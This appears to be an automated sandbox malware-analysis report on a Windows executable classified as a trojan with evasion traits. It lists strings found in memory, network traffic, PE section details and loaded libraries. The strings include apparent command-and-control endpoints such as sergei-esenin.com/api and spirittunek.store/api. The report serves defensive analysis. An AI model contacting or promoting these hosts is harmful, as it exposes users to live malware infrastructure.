    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000000.00000002.1579192942.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000002.1579192942.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api4
    Source: file.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apij
    Source: file.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/apiw
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spirittunek.store:443/api
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
    Source: file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.1337224103.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.1337224103.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49721 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006602280_2_00660228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065A8500_2_0065A850
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006620300_2_00662030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069A0D00_2_0069A0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E8A00_2_0068E8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006551600_2_00655160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065E1A00_2_0065E1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694A400_2_00694A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065A3000_2_0065A300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067C4700_2_0067C470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067CCD00_2_0067CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00657CA40_2_00657CA4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006644870_2_00664487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066049B0_2_0066049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067FD100_2_0067FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066C5F00_2_0066C5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006535B00_2_006535B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006585900_2_00658590
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065BEB00_2_0065BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00666EBF0_2_00666EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065AF100_2_0065AF10
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0066D300 appears 47 times
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1888
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9994069719471947
    Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/9@10/2
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7364
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\883a23a0-3b83-4742-b3a2-bd2b5c97d85eJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: file.exeString found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeW
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1888
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1940
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 3038720 > 1048576
